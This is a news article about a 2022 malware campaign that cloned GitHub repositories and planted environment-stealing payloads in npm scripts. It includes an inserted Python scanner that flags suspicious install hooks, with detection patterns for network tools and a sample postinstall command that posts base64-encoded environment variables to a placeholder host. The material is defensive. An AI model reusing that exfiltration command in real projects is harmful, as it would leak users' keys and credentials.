To ensure that every revision can be verified, the developer who discovered the vulnerability asked developers to sign their revisions with their GPG keys.
GitHub, a major developer platform, was hit by widespread malware. It reported 35,000 code hits on a day that also saw thousands of Solana wallets emptied for millions of dollars.
Stephen Lacy, a GitHub developer, first reported the widespread attack on Wednesday. He discovered the issue while reviewing a project that he had found through a Google search.
The attack has affected projects across several ecosystems, including crypto, Golang, Python, JavaScript, Bash and Docker. The malware is planted in npm scripts, Docker images and install docs. npm scripts are a convenient way to bundle common shell commands in a project, which also makes them an easy place to hide a payload.
I am uncovering what seems to be a massive widespread malware attack on @github.
— Stephen Lacy (@stephenlacy) August 3, 2022
- Currently over 35k repositories are infected
- So far found in projects including: crypto, golang, python, js, bash, docker, k8s
- It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9
To fool developers and gain access to critical data, the attacker creates a fake repository (a repository holds all of a project's files together with their revision history) and then pushes the clones to GitHub. The following snapshots illustrate a legitimate crypto miner and its clone.
Many of these clone repositories were pushed as "pull requests". A pull request lets a developer propose changes to a branch of a repository on GitHub and share information about those changes.
Once a developer has fallen for the attack, the malware sends the entire environment (ENV) of the script, application or laptop (in the case of Electron applications) to an attacker's server. The ENV can include security keys, AWS access keys, crypto keys and many other secrets.
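Because the payload is dropped into npm scripts and exfiltrates the environment, a cheap defensive check is to screen a project's package.json before running `npm install`. The following scanner is an added example (not code from the article or from the affected projects); the sample package.json, the hook names it treats as auto-run and the example.invalid host are constructed for illustration.

```python
import json
import re

# Lifecycle hooks that npm runs on its own during install; a malicious clone
# can hide a payload here so it executes without the developer invoking it.
AUTO_RUN_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# Indicators that a script reads the process environment ...
ENV_READ = re.compile(r"process\.env|os\.environ|printenv|\$\(env\b|`env\b")
# ... and that it pushes data over the network.
NETWORK_SEND = re.compile(r"\bcurl\b|\bwget\b|https?://|fetch\(|http\.request", re.IGNORECASE)
# Long base64-looking runs hint at an obfuscated payload.
ENCODED = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def script_findings(name, body):
    """Return the reasons a single npm script looks like an ENV stealer (empty if clean)."""
    reasons = []
    reads_env = bool(ENV_READ.search(body))
    sends_net = bool(NETWORK_SEND.search(body))
    if reads_env and sends_net:
        reasons.append("reads the environment and sends data over the network")
    if name in AUTO_RUN_HOOKS and sends_net:
        reasons.append(f"auto-run hook '{name}' contacts the network")
    if "base64" in body.lower() or ENCODED.search(body):
        reasons.append("contains encoded or obfuscated content")
    return reasons


def scan_package_json(text):
    """Parse package.json text and map each suspicious script name to its findings."""
    scripts = json.loads(text).get("scripts", {})
    report = {}
    for name, body in scripts.items():
        reasons = script_findings(name, str(body))
        if reasons:
            report[name] = reasons
    return report


# Constructed sample: a cloned project whose postinstall hook ships the ENV
# to a placeholder host (example.invalid is a reserved, non-routable name).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-wallet-tool",
    "scripts": {
        "test": "jest",
        "build": "tsc -p .",
        "postinstall": "curl -s -X POST --data \"$(env | base64)\" http://example.invalid/collect",
    },
})

if __name__ == "__main__":
    print(json.dumps(scan_package_json(SAMPLE_PACKAGE_JSON), indent=2))
```

Run it against a freshly cloned project's package.json before installing; any flagged auto-run hook deserves a manual read of the repository's history and signatures.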
The developer reported the issue to GitHub and advised developers to GPG-sign their revisions to the repository. GPG keys add a layer of security to a GitHub account and its software projects: they allow anyone to verify that every revision came from a trusted source.